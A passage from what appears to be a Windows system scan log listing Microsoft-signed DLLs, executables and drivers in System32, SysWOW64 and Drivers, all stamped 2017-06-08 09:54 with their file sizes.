C:\WINDOWS\system32\dbghelp.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 01583616 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieapfltr.dll 2017-06-08 09:54 - 
2017-06-08 09:54 - 01557288 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\crypt32.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 01536512 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Immersive.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 01529384 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\winmde.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 01518088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WindowsCodecs.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 01506816 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\quartz.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 01506712 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinapi.appcore.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 01474800 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.ApplicationModel.Store.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 01468416 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.desktop.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 01463296 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieapfltr.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 01459728 _____ (Microsoft Corporation) C:\WINDOWS\system32\msctf.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 01455592 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfplat.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 01450496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UIAutomationCore.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 01433600 _____ (Microsoft Corporation) C:\WINDOWS\system32\SystemSettings.Handlers.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 01356800 _____ (Microsoft Corporation) C:\WINDOWS\system32\audiosrv.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 01333136 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msctf.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 01325456 _____ (Microsoft Corporation) C:\WINDOWS\system32\ole32.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 01320352 _____ (Microsoft Corporation) C:\WINDOWS\system32\wpx.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 01302528 _____ (Microsoft Corporation) 
C:\WINDOWS\system32\MSVPXENC.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 01295872 _____ (Microsoft Corporation) C:\WINDOWS\system32\dosvc.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 01292288 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MSVPXENC.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 01285120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dbghelp.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 01275904 _____ (Microsoft Corporation) C:\WINDOWS\system32\ShareHost.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 01269760 _____ (Microsoft Corporation) C:\WINDOWS\system32\enterprisecsps.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 01266544 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\twinapi.appcore.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 01257472 _____ (Microsoft Corporation) C:\WINDOWS\system32\wpnapps.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 01242624 _____ (Microsoft Corporation) C:\WINDOWS\system32\SharedStartModel.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 01219560 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfsvr.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 01141760 _____ (Microsoft Corporation) C:\WINDOWS\system32\MapsStore.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 01120864 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfsvr.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 01102848 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingSyncCore.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 01085440 _____ (Microsoft Corporation) C:\WINDOWS\system32\rpcss.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 01078272 _____ (Microsoft Corporation) C:\WINDOWS\system32\StoreAgent.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 01076736 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.appcore.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 01067008 _____ (Microsoft Corporation) C:\WINDOWS\system32\XboxNetApiSvc.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 01060352 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\XpsPrint.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 01055648 _____ (Microsoft 
Corporation) C:\WINDOWS\system32\LicenseManager.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 01054208 _____ (Microsoft Corporation) C:\WINDOWS\system32\TokenBroker.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 01051648 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 01046016 _____ (Microsoft Corporation) C:\WINDOWS\system32\comdlg32.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 01035264 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ShareHost.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 01028608 _____ (Microsoft Corporation) C:\WINDOWS\system32\modernexecserver.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00988168 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ole32.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00987648 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wpnapps.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00985600 _____ (Microsoft Corporation) C:\WINDOWS\system32\TSWorkspace.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00980992 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\bthport.sys 2017-06-08 09:54 - 2017-06-08 09:54 - 00974848 _____ (Microsoft Corporation) C:\WINDOWS\system32\mmgaserver.exe 2017-06-08 09:54 - 2017-06-08 09:54 - 00972800 _____ (Microsoft Corporation) C:\WINDOWS\system32\sysmain.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00970240 _____ (Microsoft Corporation) C:\WINDOWS\system32\cdpsvc.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00970240 _____ (Microsoft Corporation) C:\WINDOWS\system32\autochk.exe 2017-06-08 09:54 - 2017-06-08 09:54 - 00961952 _____ (Microsoft Corporation) C:\WINDOWS\system32\efscore.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00952832 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\comdlg32.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00909824 _____ (Microsoft Corporation) C:\WINDOWS\system32\ISM.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00909312 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SettingSyncCore.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00899584 _____ 
(Microsoft Corporation) C:\WINDOWS\SysWOW64\twinui.appcore.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00892416 _____ (Microsoft Corporation) C:\WINDOWS\system32\MessagingDataModel2.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00891904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\autochk.exe 2017-06-08 09:54 - 2017-06-08 09:54 - 00866816 _____ (Microsoft Corporation) C:\WINDOWS\system32\NPSMDesktopProvider.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00864256 _____ (Microsoft Corporation) C:\WINDOWS\system32\NotificationController.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00846848 _____ (Microsoft Corporation) C:\WINDOWS\system32\bisrv.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00840192 _____ (Microsoft Corporation) C:\WINDOWS\system32\fveapi.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00826368 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\NPSMDesktopProvider.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00809472 _____ (Microsoft Corporation) C:\WINDOWS\system32\SecurityHealthSSO.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00807424 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\StoreAgent.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00799232 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TokenBroker.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00790528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00777400 _____ (Microsoft Corporation) C:\WINDOWS\system32\oleaut32.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00754176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MessagingDataModel2.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00754080 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\LicenseManager.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00751104 _____ (Microsoft Corporation) C:\WINDOWS\system32\msfeeds.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00750080 _____ (Microsoft Corporation) C:\WINDOWS\system32\StorSvc.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00741784 _____ (Microsoft Corporation) 
C:\WINDOWS\system32\Windows.Internal.Shell.Broker.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00731136 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mmgaserver.exe 2017-06-08 09:54 - 2017-06-08 09:54 - 00730016 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\vhdmp.sys 2017-06-08 09:54 - 2017-06-08 09:54 - 00722944 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\srv2.sys 2017-06-08 09:54 - 2017-06-08 09:54 - 00716440 _____ (Microsoft Corporation) C:\WINDOWS\system32\MSVideoDSP.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00712608 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgmms2.sys 2017-06-08 09:54 - 2017-06-08 09:54 - 00708712 _____ (Microsoft Corporation) C:\WINDOWS\system32\kernel32.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00707072 _____ (Microsoft Corporation) C:\WINDOWS\system32\winlogon.exe 2017-06-08 09:54 - 2017-06-08 09:54 - 00687104 _____ (Microsoft Corporation) C:\WINDOWS\system32\LogonController.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00681984 _____ (Microsoft Corporation) C:\WINDOWS\system32\usocore.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00673280 _____ (Microsoft Corporation) C:\WINDOWS\system32\LockAppBroker.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00673112 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppResolver.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00667040 _____ (Microsoft Corporation) C:\WINDOWS\system32\ci.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00663040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msfeeds.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00654976 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentClient.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00651680 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingSyncHost.exe 2017-06-08 09:54 - 2017-06-08 09:54 - 00647168 _____ (Microsoft Corporation) C:\WINDOWS\system32\RDXService.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00646656 _____ (Microsoft Corporation) C:\WINDOWS\system32\LockHostingFramework.dll 2017-06-08 
09:54 - 2017-06-08 09:54 - 00641536 _____ (Microsoft Corporation) C:\WINDOWS\system32\rdbui.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00624640 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioEndpointBuilder.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00616960 _____ (Microsoft Corporation) C:\WINDOWS\system32\WindowManagement.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00606960 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\oleaut32.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00601088 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.System.Launcher.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00599576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\kernel32.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00590848 _____ (Microsoft Corporation) C:\WINDOWS\system32\vbscript.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00586240 _____ (Microsoft Corporation) C:\WINDOWS\system32\OneDriveSettingSyncProvider.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00585216 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppReadiness.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00584192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UIRibbonRes.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00584192 _____ (Microsoft Corporation) C:\WINDOWS\system32\UIRibbonRes.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00559000 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SettingSyncHost.exe 2017-06-08 09:54 - 2017-06-08 09:54 - 00557568 _____ (Microsoft Corporation) C:\WINDOWS\system32\wpnprv.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00549888 _____ (Microsoft Corporation) C:\WINDOWS\system32\DictationManager.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00546208 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\storport.sys 2017-06-08 09:54 - 2017-06-08 09:54 - 00545792 _____ (Microsoft Corporation) C:\WINDOWS\system32\winspool.drv 2017-06-08 09:54 - 2017-06-08 09:54 - 00543648 _____ (Microsoft Corporation) C:\WINDOWS\system32\securekernel.exe 2017-06-08 09:54 - 2017-06-08 09:54 - 00527360 _____ 
(Microsoft Corporation) C:\WINDOWS\system32\aadcloudap.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00524800 _____ (Microsoft Corporation) C:\WINDOWS\system32\TileDataRepository.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00523296 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppResolver.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00519680 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppXDeploymentClient.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00518144 _____ (Microsoft Corporation) C:\WINDOWS\system32\daxexec.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00510976 _____ (Microsoft Corporation) C:\WINDOWS\system32\TDLMigration.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00507392 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\vbscript.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00491520 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsHandlers_Display.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00476672 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\OneDriveSettingSyncProvider.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00476160 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Core.TextInput.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00457728 _____ (Microsoft Corporation) C:\WINDOWS\system32\webplatstorageserver.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00450048 _____ (Microsoft Corporation) C:\WINDOWS\system32\bcdedit.exe 2017-06-08 09:54 - 2017-06-08 09:54 - 00444928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.System.Launcher.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00439808 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.Midi.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00433664 _____ (Microsoft Corporation) C:\WINDOWS\system32\msIso.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00429568 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\winspool.drv 2017-06-08 09:54 - 2017-06-08 09:54 - 00427008 _____ (Microsoft Corporation) C:\WINDOWS\system32\provengine.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00422400 _____ (Microsoft 
Corporation) C:\WINDOWS\system32\WpAXHolder.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00417792 _____ (Microsoft Corporation) C:\WINDOWS\system32\InstallAgentUserBroker.exe 2017-06-08 09:54 - 2017-06-08 09:54 - 00414208 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\srv.sys 2017-06-08 09:54 - 2017-06-08 09:54 - 00411040 _____ (Microsoft Corporation) C:\WINDOWS\system32\msv1_0.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00409600 _____ (Microsoft Corporation) C:\WINDOWS\system32\updatehandlers.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00409504 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgmms1.sys 2017-06-08 09:54 - 2017-06-08 09:54 - 00408064 _____ (Microsoft Corporation) C:\WINDOWS\system32\ActivationManager.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00406528 _____ (Microsoft Corporation) C:\WINDOWS\system32\InputSwitch.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00406064 _____ (Microsoft Corporation) C:\WINDOWS\system32\MMDevAPI.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00394240 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\DictationManager.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00392704 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PlayToManager.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00388000 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\USBXHCI.SYS 2017-06-08 09:54 - 2017-06-08 09:54 - 00387928 _____ (Microsoft Corporation) C:\WINDOWS\system32\wmpps.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00386560 _____ (Microsoft Corporation) C:\WINDOWS\system32\iedkcs32.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00374784 _____ (Microsoft Corporation) C:\WINDOWS\system32\InstallAgent.exe 2017-06-08 09:54 - 2017-06-08 09:54 - 00370928 _____ (Microsoft Corporation) C:\WINDOWS\system32\SystemSettingsAdminFlows.exe 2017-06-08 09:54 - 2017-06-08 09:54 - 00368128 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InstallAgentUserBroker.exe 2017-06-08 09:54 - 2017-06-08 09:54 - 00364032 _____ (Microsoft Corporation) 
C:\WINDOWS\SysWOW64\msIso.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00363424 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\fastfat.sys 2017-06-08 09:54 - 2017-06-08 09:54 - 00362496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\daxexec.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00361472 _____ (Microsoft Corporation) C:\WINDOWS\system32\ConhostV2.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00354400 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MMDevAPI.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00354360 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\bcryptprimitives.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00354304 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InputSwitch.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00354304 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ActivationManager.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00349600 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msv1_0.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00347136 _____ (Microsoft Corporation) C:\WINDOWS\system32\XpsDocumentTargetPrint.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00338432 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iedkcs32.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00335808 _____ (Microsoft Corporation) C:\WINDOWS\system32\SecurityHealthService.exe 2017-06-08 09:54 - 2017-06-08 09:54 - 00334336 _____ (Microsoft Corporation) C:\WINDOWS\system32\wc_storage.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00332800 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.Midi.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00329728 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\webplatstorageserver.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00329728 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InstallAgent.exe 2017-06-08 09:54 - 2017-06-08 09:54 - 00315392 _____ (Microsoft Corporation) C:\WINDOWS\system32\NotificationObjFactory.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00314880 _____ (Microsoft Corporation) 
C:\WINDOWS\system32\SettingsEnvironment.Desktop.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00301056 _____ (Microsoft Corporation) C:\WINDOWS\system32\EnterpriseAppMgmtSvc.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00299520 _____ (Microsoft Corporation) C:\WINDOWS\system32\AboveLockAppHost.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00296448 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudBackupSettings.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00287648 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\sdbus.sys 2017-06-08 09:54 - 2017-06-08 09:54 - 00282112 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\VEEventDispatcher.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00280064 _____ (Microsoft Corporation) C:\WINDOWS\system32\WiFiDisplay.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00277504 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\xboxgip.sys 2017-06-08 09:54 - 2017-06-08 09:54 - 00274944 _____ (Microsoft Corporation) C:\WINDOWS\system32\dxtrans.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00266240 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dxtrans.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00257024 _____ (Microsoft Corporation) C:\WINDOWS\system32\webcheck.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00255904 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppxAllUserStore.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00252928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\XpsDocumentTargetPrint.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00251904 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Gaming.Preview.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00246272 _____ (Microsoft Corporation) C:\WINDOWS\system32\domgmt.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00233472 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WiFiDisplay.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00232960 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\webcheck.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00232960 _____ (Microsoft Corporation) 
C:\WINDOWS\system32\wcmcsp.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00232448 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CloudBackupSettings.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00232448 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Web.Diagnostics.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00224256 _____ (Microsoft Corporation) C:\WINDOWS\system32\ie4uinit.exe 2017-06-08 09:54 - 2017-06-08 09:54 - 00218624 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Streaming.ps.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00211872 _____ (Microsoft Corporation) C:\WINDOWS\system32\browserbroker.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00209408 _____ (Microsoft Corporation) C:\WINDOWS\system32\smartscreenps.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00208896 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.AppDefaults.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00203776 _____ (Microsoft Corporation) C:\WINDOWS\system32\PackageStateRoaming.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00199680 _____ (Microsoft Corporation) C:\WINDOWS\system32\RstrtMgr.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00192512 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.SharedPC.AccountManager.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00188824 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dumpsd.sys 2017-06-08 09:54 - 2017-06-08 09:54 - 00181664 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppxAllUserStore.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00175616 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PackageStateRoaming.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00174080 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Web.Diagnostics.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00174080 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\RstrtMgr.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00164864 _____ (Microsoft Corporation) C:\WINDOWS\system32\EnterpriseModernAppMgmtCSP.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00159744 
_____ (Microsoft Corporation) C:\WINDOWS\system32\NPSM.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00155136 _____ (Microsoft Corporation) C:\WINDOWS\system32\VEStoreEventHandlers.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00149504 _____ (Microsoft Corporation) C:\WINDOWS\system32\embeddedmodesvc.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00148480 _____ (Microsoft Corporation) C:\WINDOWS\system32\umpo.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00144288 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\storahci.sys 2017-06-08 09:54 - 2017-06-08 09:54 - 00142240 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\wcifs.sys 2017-06-08 09:54 - 2017-06-08 09:54 - 00141824 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\smartscreenps.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00140288 _____ (Microsoft Corporation) C:\WINDOWS\system32\iepeers.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00133120 _____ (Microsoft Corporation) C:\WINDOWS\system32\XblGameSaveExt.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00128000 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\NPSM.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00124928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iepeers.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00118784 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\netvsc.sys 2017-06-08 09:54 - 2017-06-08 09:54 - 00112544 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dam.sys 2017-06-08 09:54 - 2017-06-08 09:54 - 00105456 _____ (Microsoft Corporation) C:\WINDOWS\system32\imagehlp.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00096256 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtmled.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00095584 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\imagehlp.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00091648 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfmjpegdec.dll 2017-06-08 09:54 - 2017-06-08 09:54 - 00089088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\olepro32.dll 2017-06-08 09:54 - 
